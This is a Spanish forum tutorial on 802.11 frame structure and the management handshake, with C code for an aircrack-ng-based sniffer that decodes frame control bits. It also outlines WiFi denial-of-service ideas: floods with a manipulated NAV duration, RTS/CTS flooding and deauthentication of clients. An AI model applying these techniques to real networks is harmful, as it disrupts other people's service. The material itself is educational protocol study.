Tenemos que leer esos bits de derecha a izquierda, por ejemplo, supongamos que el campo frame control  contiene el valor 08 41 en hexadecimal...  en binario son:


0 = 0000
8 = 1000
4 = 0100
1 = 0001


Los interpretaremos de "derecha a izquierda" y por parejas, esto es,  leemos los bits de derecha a  izquierda:

08 = 0000 1000



41 = 0100 0001



Observa que los bits están "rotados" de forma que el "mas significativo" es el que está mas a la izquierda,  vamos que no hay que interpretarlo (según el ejemplo) así:



Ahora pasemos a explicar cada campo (al menos los mas significativos)

Versión del Protocolo: bit 0 y 1

Serán siempre cero. Otros valores significarán que no se corresponde con el estándar (por ejemplo una versión propia  de un fabricante)

Tipo de Trama (bits 2 y 3)

Identifican el tipo de trama, es decir, si es de administración, de control o de datos.

Subtipo (bits 4,5,6 y 7)

Es una descripción mas detallada del tipo.

ToDS (bit 8 )

Este bit está a uno cuando la trama viaja hacia el sistema de distribución, por ejemplo  si la trama la envía un punto de acceso a otro punto de acceso o si una estación envía la trama al punto de acceso.

FromDS (bit 9)

Este bit está a uno si la trama viaja desde el sistema de distribución, por ejemplo  cuando un punto de acceso envía tramas a las estaciones. También está a uno cuando la trama viaja de un punto de  acceso a otro.

WEP (bit 14)

Este bit se activa (a uno) si los datos están cifrados, en caso contrario los datos viajan en texto plano.

El resto de bits (por ahora) no tienen mucho significado en esta explicación, eso sí, conviene aclarar o ampliar los  valores de tipo, subtipo, ToDS y FromDS, unas tablas ayudarán a ello.





Seguro que sino estás pensando que esto es un rollo, al menos pensarás que de momento es fácil...vamos a plantear  tres  preguntas (con trampa, claro, de lo contrario no tiene gracia)

1.- Según lo expuesto... Si nos encontramos con una trama y los bits 8 y 9 de FC están a cero...¿podemos  asegurar que se trata de una comunicación ad-hoc?

R: Si consultamos la tabla que os puse antes, es tajante la respuesta es SI. Pero no es oro todo lo que  reluce...La respuesta correcta es NO.

Si bit 8 y bit 9 son cero, efectivamente puede ser una comunicación ad-hoc siempre y cuando la trama sea de DATOS!!!

Si, por ejemplo, la trama es de administración (por ejemplo un beacon o señalización) bit 8 y bit 9 son cero y por  supuesto...no es una comunicación entre estaciones.

2.- Otra...Es posible encontrarnos con una trama en la que la cabecera MAC tiene menos de 24 bytes???

R: Al igual que antes, si repasamos lo dicho, la respuesta es NO, puesto que len la cabecera MAC exite un FC  de 2 bytes, una duración de 2 bytes. al menos 3 direcciones MAC de 6 bytes cada una (18 en total) y un número de  secuencia/fragmento de otros 2 bytes, o sea, un mínimo de 24 bytes...pero la respuesta correcta debería haber sido  SI!!!!

SI, por ejemplo una trama de control con subtipo Clear-to-Send (permitido para transmitir) tiene únicamente una  longitud de 10 bytes: 2 para FC, 2 para la duración y 6 para la MAC del punto de acceso quien la envía.

3.- Al analizar una trama descubrimos que el bit 14 (Wep) está activado...¿Es realmente una trama cifrada con  WEP?

R: NO. Ciertamente los datos (el cuerpo de la trama) estarán cifrados, pero no tiene que ser obligatoriamente  con WEP. Bien puede ser WPA o WPA2, este bit indica que los datos están protegidos, pero no te dejes engañar por el  nombre del campo, el bit wep a uno indica cifrado, pero no necesariamente un cifrado WEP.

Estas tres preguntas aunque no te lo parezca por ahora, son importantes...Primero porque si nos decidimos a lanzar  "un ataque" contra una red WiFi, dependiendo de lo que queramos conseguir habrá que realizarlo sobre tramas  de datos, administración o control y en el caso de atacar un cifrado, pues contra el mismo...

Ahora que ya somos capaces de "identificar" los diferentes tipos de tramas, vamos a representar "la  coreografía" de cómo funciona todo el mecanismo:

Primero conocer los "estados" en los que nos podemos encontrar:

Un cliente puede estar:
    * No asociado ni autenticasdo: Es decir, ni tan siquiera intentó "conectarse" a la red inalámbrica
    * Autenticado: El cliente desea participar de la red pero todavía no finalizó  la asociación por completo.
    * Asociado: El cliente se asoció y al proporcionar una clave correcta "disfruta" de los recursos de la red.


Como ves en la figura, un cliente asociado puede dejar de estarlo y permanecer autenticado.

Normalmente son los puntos de acceso quienes envían tramas de disociación y des-autenticación.

Son los clientes (las estaciones) los que envían tramas de autenticación, asociación y/o reasociación, también de  disociación cuando abandona la red.

La reasociación es un caso especial, es aquel en el que una estación estaba asociada y recibió una trama de  disociación...entonces queda en estado autenticado y reinicia la asociación mediante una solicitud de reasociación.

Resumiendo:

Un cliente asociado (completó todo el proceso de incorporación a la red) puede ser desasociado o des-autenticado por  el punto de acceso

Un cliente autenticado puede ser des-autenticado por el punto de acceso.

Un cliente que fue desautenticado podrá solicitar una reasociación

Un cliente no asociado ni autenticado, primero solicitará autenticación y luego asociación.

Un cliente autenticado solicitará asociación o reasociación dependiendo del estado anterior al momento de la  autenticación.

Por supuesto que un cliente también puede abandonar la red sin necesidad que sea el punto de acceso quien lo haga, a  los efectos, sería igual que lo descrito anteriormente.




===============================================



ESTRUCTURA DE UN FRAME CONTROL

Un punto de acceso envía o recibe:

Beacons o señalizaciones Normalmente lo hace a intervalos regulares y sirve para que los  clientes "lo vean" y puedan conectarse al mismo.

Se puede "restringir" el envío de beacons, si este es el caso, el cliente debe conocer el essid  (nombre) para poder realizar los pasos de asociación y autenticación.. Es el mecanismo por el que las estaciones  pueden enumerar todos los puntos de acceso disponibles.

El formato típico de una trama beacon es esta:



* También puede existir un cuarto campo de MAC después del número de secuencia para el caso de comunicación entre  puntos de acceso.

El FC de un beacon es:



El cuerpo de un beacon contiene información del tipo: Marcas de tiempo, intervalo de señalización, SSID, Tasa de  transmisión soportada (1Mb, 11Mb, 22Mb, etc), Frecuencia, y otros como DS, CF, IBSS, TIM, País, patrones y  parámetros FH.

En una ampliación posterior hablaremos de ello (para los curiosos)

Probes: Es un intercambio de mensajes que típicamente ocurre entre el punto de acceso  y las estaciones, los mas habituales son: Request y Response (Solicitud de Sondeo y Respuesta de Sondeo)

El formato típico de una trama Probe es esta:



* También puede existir un cuarto campo de MAC después del número de secuencia para el caso de comunicación entre  puntos de acceso.

El FC de un Probe Request es:



El cuerpo de un mensaje de tipo Probe Request contiene el SSID, Tasas de datos soportados y otros identificadores  que puedan resultar interesantes.



El cuerpo de un mensaje de tipo Probe Response contiene básicamente los mismos elementos que el de un beacon  mas los identificadores solicitados mediante el probe request que se solicitó.

Autenticación:

La autenticación implica una serie de intercambios entre las estaciones y el punto de acceso. No siempre se  realiza de la misma manera, esto es porque pueden existir otros sistemas de autenticación (tipo RADIUS) que también  pueden estar presentes.

Por lo general, una trama de Autenticación es esta:



* También puede existir un cuarto campo de MAC después del número de secuencia para el caso de comunicación entre  puntos de acceso.

El cuerpo del mensaje de una trama de autenticación depende de cada contexto, de los algoritmos de cifrado si los  hay, de los protocolos, etc... Entre ellos también existe un número de secuencia para la autenticación en curso y  códigos de estado y respuesta.

Un ejemplo típico es:
    Cuerpo del mensaje de autenticación:

    2 bytes para el algoritmo y/o tipo: por ejemplo 00 00 para Sistemas Open
    2 bytes para el número de secuencia, p.e. 01 00 (nº secuencia 1)
    2 bytes para definir el estado o razón de la autenticación, p.e. 00 00 (satisfactorio)
El FC de una solicitud de autenticación es:



Una vez se hayan intercambiado toda la serie de mensajes entre el punto de acceso y las estaciones, el punto de  acceso enviará otra trama de autenticación al cliente con idéntica estructura en su FC pero en el cuerpo de la trama  incluirá:

Número de secuencia de autenticación recibida + 1 (si se envió 0100 se recibirá 0200)

Estado o razón de la autenticación: por ejemplo 00 00 si resultó satisfactoria.

Desautenticación

Este tipo de trama es de "una sola vía" y normalmente lo envía un punto de acceso a una estación o a todas  (broadcast) con el objeto de des-autenticar a los clientes autenticados. y/o asociados. En cualquiera de los casos,  las estaciones clientes deberán repetir todo el proceso para "volver" a la red.

Por lo general, una trama de Des-Autenticación es esta:



MAC1 es la dirección MAC del equipo que esta siendo desautenticado
MAC2

El cuerpo de la trama contiene entre otros datos, información de las razones de la desautenticación

El FC de una des-autenticación es:



Asociación

Consiste en un intercambio de tramas de administración con subtipo Request y Response una vez que la  autenticación resultó correcta.



En el cuerpo de la trama se incluye información diversa acerca de las capacidades del dispositivo, tasas de  transmisión  (Rate) soportados, QoS, el ESSID, y opcionalmente razones y estados de la solicitud de la asociación.

El FC de una Solicitud de Asociación es:



Así mismo, la respuesta de la asociación es esta:



En la Cabecera MAC de las tramas de Asociación, las MAC's de cada dispositivo "bailan" dependiendo de si es una  Solicitud o Respuesta, en cualquier caso siguen la forma definida: Destino – Origen – BSSID

Relativo a la Asociación, existen otros dos formatos de trama relacionados, estas son Reasociación y Disociación.

Un Punto de Acceso puede enviar tramas de disociación a una determinada estación o a todas (broadcast). El resultado  final serán clientes desconectados.

Un cliente o estación, puede enviar tramas de reasociación tras recibir una disociación y generalmente son también  de un  sólo sentido. También un cliente puede enviar tramas de reasociación si ya está conectado a un punto de  acceso y desea asociarse con otro.

Reasociación

El Formato trama para una reasociación es:



Observa que en este caso tenemos 4 MAC's, de forma que:

MAC1 es la dirección del cliente
MAC2 es la del Punto de acesso con el que se desea reasociar
MAC3 es la dirección del punto de Acceso con el se está actualmente asociado
MAC4 Es la dirección del BSSID

El FC para una Solicitud de reasociación es:



El FC para una Respuesta de reasociación es:



Disociación

El Formato trama para una disociación es::



En este caso sólo se utilizan dos direcciones MAC, una para la dirección de la estación que se desea disociar (o  broadcast para todas) y la otra para la dirección MAC del Punto de Acceso.

En el cuerpo de la trama se incluyen razones y/o estados relevantes a la disociación

El FC de una disociación es:



Resumen: según lo visto hasta ahora, las tramas de Administración y sus correspondientes FC serían:




===========================================



ANÁLISIS DE CAPTURA DE TRÁFICO 802.11

Conviene practicar con algún esnifer para afianzar lo explicado, un buen candidato es WireShark (usa el que  prefieras) a continuación te pongo una serie de pantallas que ilustran todo lo explicado.

Se han eliminado bastantes paquetes de las capturas y aunque no están todas las tramas que hemos estudiado, la  mayoría sí.

El punto de Acceso es un Cisco Linksys y la estación la tarjeta identificada como D-Link:

En la primera pantalla "observamos" la secuencia de lo sucedido:


    *   El Punto de Acceso envía sus beacons (paq. 1)
    *   El cliente envía Probe Request (paq. 2)
    *   El punto de Acceso responde con sus Probe Response (paq. 3)
    *   El cliente inicia la autenticación (paq. 4)
    *   Envía un ACK (trama de control) paq. 5
    *   El punto de acceso responde a la autenticación (Paq. 6)
    *   Y También envía una trama de control de asentimiento ACK (paq. 7)
    *   El cliente inicia la asociación Solicitud junto con el ACK (paq. 8 y  9)
    *   El Punto de acceso envía una respuesta de autenticación y el ACK (paq. 10 y 11)
    *   Se inicia el intercambio de datos (paq. 12 y 13)
    *   El cliente se desautentica (paq. 14)
Obviamente hay muchos otros intercambios, ack's, tramas de control del tipo RTS y CTS, pero básicamente ese es el  proceso, lo vemos:


Escenario General



Paquete 1. Beacon



Paquete 2. Probe Request



Paquete 3. Probe Response



Paquete 4. Autenticación



Paquete 5. Trama de Control. ACK



Paquete 6. Autenticación



Paquete 7. Trama de Control ACK



Paquete 8. Asociación Request



Paquete 9. Trama de Control. ACK



Paquete 10. Asociación Response.



Paquete 11. Trama de Control. ACK



Paquete 12. Trama de Datos



Paquete 13. Trama de Datos



Paquete 14. Desautenticación



Para los que queráis observar con mas detalle estos mismos paquetes capturados os dejo un enlace para que os podáis  [size=18]descargar [/size]el archivo .cap del mismo: http://www.megaupload.com/?d=Y32ZK1G3

Ale!! a estudiar ;)



========================================

LA DANZA DE MAC'S Y TIPOS DE TRAMA

No puedo terminar esta parte sin comentar algo que es muy importante a la hora de analizar el tráfico de tramas de  datos.

Como dije al comienzo de este documento, cuando existen datos a transmitir, o mejor dicho, cuando el tipo de trama  en la FC es de datos (10) las direcciones MAC "bailan" dependiendo de si están activos o no los bits toDS y FromDS,  te pongo una imagen que vale mas que mil palabras:

Y un ejemplo general...

Un cliente envía un ping al punto de de acceso, por tanto toDS está a uno (1) y FromDs estará a cero  (0)
    En la cabecera MAC de la trama las direcciones MAC1, Mac2 y Mac3 serían:

    MAC1 = BSSID (la MAC del punto de acceso)
    MAC2 = Origen (la MAC del cliente)
    MAC3 = Destino (la MAC del punto de acceso
Ahora el punto de acceso responde...FromDS = 1 y ToDS=0
    MAC1= Destino (la MAC del cliente)
    MAC2= BSSID (la MAC del punto de acceso)
    MAC3= Origen (la MAC del punto de acceso)
Observa que en este caso no es el consabido destino-origen-bssid,  realmente esto sólo se cumple cuando ToDS y FromDS están a cero (comunicación ad-hoc o por ejemplo, tramas de  administración)

También puedes pensar que para qué 3 MAC's?? si la comunicación es entre dos...claro, cuando la  comunicación es entre punto de acceso y cliente (exclusivamente) pues es como "raro", pero imagina que la  comunicación es entre dos clientes inalámbricos...por ejemplo STA-01 hace un ping a STA-99

STA-01 enviará una trama de datos hacia el punto de acceso pero con destino a STA-99, bits toDS a 1 y FromDS a 0
    MAC1 = BSSID (mac del punto de acceso)
    MAC2 = Origen (mac de STA-01)
    MAC3 = Destino (mac de STA-99)
El punto de acceso enviará los datos a STA-99 con bit toDS a 0 y FromDS a 1
    MAC1 = Destino (Mac de STA-99)
    MAC2 = BSSID (Mac del punto de acceso)
    MAC3 = Origen (Mac de STA-01)
STA-99 recibe el paquete y responde al ping...lo enviará hacia el sistema de distribución con destino a STA-01 (bit  FromDS =0 y toDS=1)
    MAC1= BSSID (mac del punto de acceso)
    MAC2 = Origen (MAC de STA-99)
    MAC3 = Destino (MAC de STA-01)
Por último, el punto de acceso envía el paquete a STA-01 con bits FormDS=1 y toDS=0
    MAC1 = Destino (Mac de STA-01)
    MAC2 = BSSID (Mac del punto de acceso)
    MAC3 = Origen (Mac de STA-99)
No olvides esto!!! Será importante a la hora de "colocar" bien las MAC's cuando  usemos herramientas del tipo aircrack-ng o las nuestras propias.

Para saber si una trama viaja desde o hacia el sistema de distribución (y así colocar las mac's en su orden  correcto) sólo tendremos que comprobar el byte 1 de Frame Control, imagina que capturas una trama de datos que es  algo así:

08 42 2c 00 00 00 1d ... ... .

Lo que tendremos que hacer es "analizar" el segundo byte de la FrameControl,  por ejemplo, para saber si FromDS está  activado:

Supongamos que tenemos un array llamado paquete[] que tiene todos y cada uno de los valores de la trama, de tal  modo:

paquete[0]=0x08
paquete[1]=0x42
paquete[2]=0x2c
y así hasta el final...


El que nos interesa es paquete[1], si hacemos un AND con 0x01 ó con 0x02 obtendremos 1 ó  2 dependiendo del estado de toDS y de FromDS:

If paquete[1] AND 0x02 = 0x02 entonces es un paquete FromDS activado
If paquete[1] AND 0x01 = 0x01 entonces es un paquete toDS activado


También podríamos comprobarlo así:

Estado= paquete[1] AND 0x03

Switch (Estado) {

Case 0: es un paquete con FromDS y TodS a cero, probablemente de una
Una estación a otra estación (modo as-hoc)

Case 1: Es un paquete con FromDS a cero y ToDS a uno, probablemente de
Un cliente al punto de acceso

Case 2: Es un paquete con FromDS a uno y toDS a cero, probablemente de
 Un punto de acceso a un cliente

Case 3: Es un paquete con FromDs a uno y ToDS a uno, probablemente de
Un punto de acceso a otro punto de acceso (modo wds)
}


Así mismo, si deseáramos averiguar si se trata de una trama de datos, podríamos hacer algo asi:

If paquete[0] AND 0x0c = 0x08 se trata de un paquete de datos
If paquete[0] AND 0x0c = 0x00 se trata de una trama de administración
If paquete[0] AND 0x0c = 0x04 se trata de un trama de control


Observa que ahora se analizó el byte cero del paquete correspondiente.

Para saber si un paquete es QoS o no, también comprobaremos el byte cero.

If paquete[0] AND 0x80 = 0x80 se trata de un paquete QoS

Esto viene a cuento porque en el momento que estemos preparados, vamos a crear pequeños "programas" para poder  analizar el tráfico y/o enviar tramas "a nuestro gusto".


=================================

Seguimos con el Taller... .

Ya sí...os prometía "descanso", continuar con WEP, etc... pero... Como quiero que empecemos a "tocar bola"  cuanto antes vamos a seguir y no precisamente con lo "prometido" (bueno casi sí)

En este post vamos a "sentar" los principios de "los desafíos" que han de sortear las estaciones WiFi  para acceder al medio.

Gracias a esta información vamos a entender algunos de los "ataques" de Denegación de Servicio (DoS).

Lo que voy a contar es algo que pocas veces se toma en cuenta y que desgraciadamente, ni siquiera se comenta en  otros sitios (incluidos muy prestigiosos libros y documentos) o si se hace, lo explican de forma muy somera y con  poca claridad.

En las comunicaciones por cable (léase Ethernet que a todos nos suena mas) es razonable pensar que  cuando una trama se transmite el receptor la recibe correctamente.

Vale, sabemos que no siempre es así, que pueden existir "colisiones" sobretodo cuando usamos Hub's en  lugar de switches, aún con switches podemos tener colisiones en la red, especialmente lo que se denomina colisiones  tardías, difíciles de diagnosticar.

Una colisión no es otra cosa que el envío simultáneo de información por dos o mas estaciones en la red.  Cuando eso ocurre, y volviendo al ejemplo de la red de cable Ethernet, los paquetes se destruyen y se hace  "un silencio" para que se vuelva a retransmitir. De esto se ocupa un protocolo llamado CSMA/CD que si  recordáis el Taller TCP/IP, era lo que llamaba el "policía de la red", que pone orden en el tráfico,  etc...

Las comunicaciones por Radio Frecuencia no están libres de colisiones, ni mucho menos, sobretodo estas que  llamamos WiFi.

Además, el protocolo 802.11 trabaja de una forma "especial", 802.11 incorpora un mecanismo de  "asentimiento positivo" de forma que TODAS las tramas enviadas deben "confirmadas" con un  ACK positivo por el receptor, de otra forma la trama se considera perdida.

Bueno, veremos mas adelante (muuuchooo mas) pero ya os lo adelanto, que hay un caso especial: QoS.

Ciertamente me sorprendió que en el hilo del tkiptun:

http://www.wadalbertia.org/phpBB2/viewtopic.php?t=5556&start=8&postdays=0&postorder=asc&highlight=

Cuando dije:

CitarOtra cosa!!! que me olvidé al hablar de "las ventajas" de usar QoS en este tipo de ataques...

Si está habilitado QoS, se pueden inyectar unos 15 tramas por cada paquete "descifrado"  

Nadie preguntó por qué con QoS se pueden enviar hasta 15 paquetes y sin QoS solamente  uno!!!! Claro, que a lo mejor ya lo sabíais y por eso no se preguntó nada... Bueno, para los que no lo supieran:

La razón de ello viene por esto que comentamos de los ACK positivos...determinadas comunicaciones QoS  usan una "ráfaga" y precisamente por ello, podemos enviar 15 tramas sin necesidad de recibir un  ACK por cada una de ellas, bastará un ACK positivo para las 15...bueno, que me estoy saliendo del tema...

El caso es que cada trama de datos enviada debe ser respondida con su correspondiente ACK



Y las preguntas con "trampa" de rigor...

1.- Y Si se "pierde" la primera trama transmitida??
2.- Y si lo que se pierde es el ACK???


Con "perder" me refiero a interferencias, problemas de comunicación, etc... vamos que no llegan al destino...

Pues en estos dos casos, la trama debe ser retransmitida (acabamos de descubrir el significado de uno de los  bits de la FC que no comentamos nada en absoluto, el bit 11 (Reintentar o retransmitir) se activa cuando una  trama lo está siendo.



Pero volvamos a lo que nos ocupa... las colisiones.

Ethernet cuenta con CSMA/CD para el tratamiento de colisiones, 802.11 cuenta con CSMA/CA.

Sin  embargo no es suficiente por sí sólo...y te pongo un ejemplo (una imagen)



Equipo 1 y equipo 2 están "al alcance"
Equipo 2 y Equipo 3, también lo están

Sin embargo, equipo 3 no se puede comunicar directamente con Equipo 1 porque "no están al alcance"

Además, es perfectamente posible que equipo 1 y equipo 3 transmitan datos al mismo tiempo, y eso...en la zona  amarilla es una colisión.

Esto es el equivalente de las colisiones tardías en Ethernet, aquí los llamamos "Nodos ocultos", es decir,  estaciones que pertenecen al medio pero que están tan alejadas unas de otras que la comunicación directa entre  ellas no es posible.

Por si fuese poco, la mayoría de las tarjetas inalámbricas operan en "half-duplex", esto es, no pueden  enviar y recibir al mismo tiempo (realmente son los transceptores de las tarjetas)

Si juntamos todo esto...el equipo 1 y el equipo 3 pueden "no percatarse" de que existe colisión!!!

¿Cómo solucionar esto?

Pues con algo de lo que seguro que has oído hablar (o seguro que leer o ver en las configuraciones de tarjetas y  puntos de acceso): Enviar tramas ce control RTS y CTS.

RTS es Request to Send, también hay quien lo llama ready to send o si lo prefieres preparado para  trnasmitir
CTS es Clear to Send o Listo para transmitir o permiso para transmirir

Ambos aseguran que el canal "está limpio y preparado para transmitir" de tal forma que otras estaciones "se callan"  hasta que el medio esté libre para poder enviar sus tramas.

Luego la imagen correcta de acceso sería:



Y si existiese un "nodo oculto" como en el ejemplo anterior, quedaría así:



Como ves en la figura anterior, el nodo oculto recibe un CTS de aquél equipo que sí es accesible y "se calla".

Ni que decir tiene que todo esto tiene una temporización (Timing) y un "umbral"  (threshold).

El timing se puede "controlar" mediante ajustes DCF, PCF o HCF que no son otra cosa que cómo va  a funcionar el protocolo CSMA/CA.

El umbral también se puede ajustar en cada tarjeta, así por ejemplo las tramas "cortas" pueden ser enviadas  inmediatamente mientras que las "largas" utilizarán RTS y CTS antes de ser enviadas.

¿Cortas y largas? ¿cómo de cortas o cómo de largas?

Pues como ya he dicho, el umbral. Aquellas que sean mas cortas que el umbral se transmitirán inmediatamente y las  que sean mas largas que el umbral, usarán los métodos RTS y CTS.

DCF es el modo "por defecto" del estándar 802.11 y funciona igual que ethernet: Escuchar antes de  hablar...y si hay silencio...se envía. Si hay colisión, se entrega un tiempo aleatorio de espera a cada estación y  vuelta a empezar.

PCF utiliza lo que se llama "Puntos de Coordinación" que son los propios puntos de acceso y difiere en  el método anterior en que permite emitir a las estaciones tras un corto periodo de tiempo exista o no colisiones.

HCF Permite a las estaciones "balancear" el tráfico en función de la mejor calidad de los servicios,  encola los paquetes dependiendo del tipo de aplicación...es.. QoS.

Tanto RTS/CTS. Como el Timming, como el umbral existen para garantizar una transmisión sin interrupciones y con el  mínimo de sobrecarga.

Y  si piensas que aquí está todo dicho...pues falta otra cosa: NAV.

NAV es un Vector de Localización de Red, lo utiliza CSMA/CA y la pareja CTS/RTS...pero  también se inicializa con el campo Duración de la Cabecera MAC:

Recordemos como era una cabecera MAC de una trama de datos:



Como ves, existen 2 bytes después del Frame Control que representan la duración.

La duración de que???

Pues el tiempo estimado que debe estar el canal disponible para trasmitir la trama.

Es un valor de 16 bits (2 bytes) de tal forma que si el bit 15 (el más significativo) está a cero el valor del resto  de bits será el valor con el que se inicializa NAV.

Es decir, NAV como mucho puede valer  2^15 =  32.768

O dicho de otra forma, el tiempo máximo que se puede reservar para la retransmisión de una trama es de 32.768 ¿qué?  Microsegundos.

Todas las estaciones de la red monitorizan las tramas y las cabeceras MAC's, de tal forma que durante la transmisión  de la trama de otro equipo, "leen" la duración de la misma y añaden ese tiempo extra como tiempo de contención antes  de enviar sus datos.

Además puede haber más información en el campo Duración, por ejemplo, si los bits 15 y 14 están a uno indica un modo  especial llamado PS-Poll que se usa en combinación de otros valores para la administración de energía y  "despertar" a las estaciones que lo implementan, para nuestro taller, sin utilidad por el momento.

Vale...y ahora que??

Pues como vamos a empezar con las Denegaciones de Servicio...porqué no usar alguna de estas  "características" para ello.

Por ejemplo, enviar tramas con una duración de 32.768 que dijimos que eran una treintavo de segundo...bueno pues  menudo DoS, no?? Jajaja,

Y si enviamos unos cientos (o miles) de paquetes de "esos" ?? Qué pasará?? Lo imaginas, no???

Y si inundamos la red con CTS/RTS???

Pues eso mismo, son ejemplos...no todo consiste en Disociar o Des-autenticar a los clientes, pueden existir y existen  "otras formas de fastidiar" sin necesidad de echar a la gente a patadas :D

Después de esta explicación pasaremos a la práctica ;)


==============================================


Practicando DoS en 802.11

1.- La base de los programas que usaremos.
2.- Creación de un esnifer sencillo
3.- Envío de tramas de desautenticación/disociación
4.- Inundación RTS/CTS con duración manipulada

[size=18]1.- La base de los programas que usaremos.[/size]

Vamos a usar "parte" del código fuente de la suite de aircrack-ng para adaptarlos a nuestros ejemplos,  así el trabajo "duro" ya está hecho y de paso, vamos comprendiendo cómo esta gente llegó a donde ha llegado...

Estos scripts no son nada modulares ni "exportables", no contemplan los numerosos errores de programación que  seguro que tienen, igualmente seguro que "sobran" porciones de código, pero caray!! Que esto no es un curso  de C, así que perdonad por la falta de rigor en la programación y centrémonos en su funcionamiento...

Usaremos airodump-ng para "husmear" el medio y luego iremos afinando los ejemplos que nos ocupan.

También es conveniente que estés familiarizado con algún esnifer.

Lo primero nos descargaremos la suite de aircrack-ng y la instalamos:

http://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz

tar xvfz aircrack-ng-1.0-rc3.tar.gz
cd  aircrack-ng-1.0-rc3
cd src
make unstable=true


En este punto ya podemos usarla...pero veamos nuestro primer programa:

2.- Crear un pequeño esnifer para examinar el tráfico. Programa  [/b]wifiesnif.c[/size]

En este ejemplo haremos lo siguiente:
    *   Abrir la tarjeta inalámbrica para poder capturar y enviar paquetes (el envío en este ejemplo no está  implementado)
    *   Capturar paquetes en el aire
    *   Mostrar los paquetes capturados
    *   Analizar el campo Frame Control de la cabecera MAC
Este mismo script podríamos usarlo para ir "mas allá", para analizar todo el paquete, los datos, el tipo de cifrado,  etc...pero para que no sea muy largo lo dejé tan sólo en:
    *   Obtener los bytes de FC
    *   Mostrar si se trata de un FromDS, toDS, WDS ó ad-hoc
    *   Mostrar el tipo de trama: Administración Datos o Control
    *   Averiguar si se trata de un paquete cifrado o no
Se podrían implementar nuevas consultas, todas la que  desees, luego te "pongo deberes"

Te recuerdo que existirán líneas del tipo #include, #define y otras que pueden no ser necesarias, están porque poco  a poco irá creciendo el programa y se necesitarán más adelante.

Veamos lo "básico" del código:

Función dump_packet

void dump_packet(unsigned char* packet, int len) // volcado de paquetes a pantalla
{
   int i=0;
printf("\n");
   for(i=0; i<len; i++)
   {
       if(i>0 && i%4 == 0)printf(" ");
       if(i>0 && i%16 == 0)printf("\n");
       printf("%02X ", packet[i]);
   }
   printf("\n");
}


La utilizaremos para mostrar por pantalla el/los paquetes capturados

Función read_packet

int read_packet(void *buf, size_t count, struct rx_info *ri) // leer paquetes Wifi
{
   struct wif *wi = _wi_in; /* XXX */
   int rc;
   rc = wi_read(wi, buf, count, ri);
   if (rc == -1) {
       switch (errno) {
       case EAGAIN:
               return 0;
       }

       perror("wi_read()");
       return -1;
   }

   return rc;
}


Se encarga de capturar el tráfico y retorna como valor el tamaño del paquete leído

Estas dos funciones anteriores son prácticamente las mismas que usan la suite de aircrack.

Función captura_datos_FC

int captura_datos_FC( int caplen) // captura de datos WiFi, comprobaciones y guardar paquete .cap
{
   char elegido[1];
   int otromas, estado;
   caplen=0;
   while( 1 )
   {
caplen = read_packet( h80211, sizeof( h80211 ), NULL );
if(caplen <= 0) continue; // si la longitud no es válida. no se capturaron paquetes
dump_packet (h80211,caplen);
printf( "\nPulsa Ctrl+C para cancelar el análisis. Analizar este paquete (s/n) ?" );
       otromas=0;
       while(otromas==0) otromas = scanf( "%s", elegido );

usleep(300);

if( elegido[0] != 's' && elegido[0] != 'S' ) continue;

printf ("\n\tFrame Control: %02X:%02X\n", h80211[0],h80211[1]); //muestra los 2 bytes de FC
estado=h80211[1] & 0x3; // Valores de FromDS y toDS (0,1,2,3)
switch (estado) {
case 0: // comunicacions adhoc y tramas de control/administración
printf ("\t......FromDS  : 0\n");
printf ("\t......toDs    : 0\n");
break;
case 1: // paquete con dirección HACIA el sistema de districubión
printf ("\t......FromDs  : 0\n");
printf ("\t......toDS    : 1\n");
break;
case 2: // paquete enviado DESDE el sistema de distribución
printf ("\t......FromDs  : 1\n");
printf ("\t......toDS    : 0\n");
break;
case 3: // paquete enviado en WDS
printf ("\t......FromDS  : 1\n");
printf ("\t......toDs    : 1\n");
break;
}

// Comprobamos el tipo de trama (datos, administración o control)
if ((h80211[0] & 0x0C) == 0x08)
printf ("\t......Trama   : de DATOS\n");

if ((h80211[0] & 0x0C) == 0x00)
printf ("\t......Trama   : de ADMINISTRACION\n");

if ((h80211[0] & 0x0C) == 0x04)
printf ("\t......Trama   : de CONTROL\n");

// Averiguamos si se trata de un paquete con el bit de cifrado activado
if ((h80211[1] & 0x40) == 0x40) {
printf ("\t......Cifrado:  SI\n");
}
else
{
printf ("\t......Cifrado : NO\n");
    }
}

   return( caplen );
}


Esta función analiza el paquete capturado mediante read_packet usando un array llamado h80211[4096] como contendor  de los bytes en hexadecimal que se han leído.

De esta forma, por ejemplo, los valores de Frame Control estarán en h80211[0] y en h80211[1], la duración en  h80211[2] y h80211[3], etc...

Creo que con los comentarios incluidos en el propio código fuente es suficiente para que lo comprendamos a estas  alturas, no??

Y por último, la función main que es el inicio del programa:

int main( int argc, char *argv[] ) // inicio del programa
{
   int caplen;

//Comprueba el paso de parámetros
  if( argc != 2 ) {
    printf("\nUso: wifiesnif interface\n\nEjemplo: wifiesnif wlan0\n\n");
       exit( 0 );
   }

/* Abrir Interface wifi para enviar/recibir tráfico */

    opt.iface_out = argv[1];
   _wi_out = wi_open(opt.iface_out);
   if (!_wi_out)
           return 1;
   dev.fd_out = wi_fd(_wi_out);
   _wi_in = _wi_out;
   dev.fd_in = dev.fd_out;
   dev.arptype_in = dev.arptype_out;
   wi_get_mac(_wi_in, dev.mac_in);
   wi_get_mac(_wi_out, dev.mac_out);

/* drop privileges */

  setuid( getuid() );

/***************************************/
/* Llamada al esnifer                  */
/***************************************/
caplen=0;
caplen=captura_datos_FC(caplen);

exit(0);
}


Vamos, está claro lo que hace, no??

No hay que preocuparse de si sabemos lenguaje C o no, vamos no importa tanto cómo abrir la interface wifi, pero sí  es importante que comprendas bien la función captura_datos_FC y cómo se averiguan los estados de toDS, FromDS, wep,  etc...

El código completo lo tienes aquí: http://www.megaupload.com/?d=0SMDIKFJ

Guárdalo junto con los otras fuentes de aircrack (así será mas fácil compilarlo) por ejemplo con el nombre  wifiesnif.c

Para compilarlo:

gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0  -Iinclude   -c -o wifiesnif.o wifiesnif.c

gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0  -Iinclude wifiesnif.o common.o crypto.o -o  wifiesnif -Losdep -losdep   -lssl -lcrypto


y ya está, lo lanzamos::

bt src # wifiesnif eth1

Pulsa Ctrl+C para cancelar el análisis. Analizar este paquete (s/n) ?n

08 41 1C 00  00 16 B6 41  03 5D 00 17  9A C3 D6 B9
00 16 B6 41  03 5B 80 88  2A 21 00 00  13 F5 7C F2
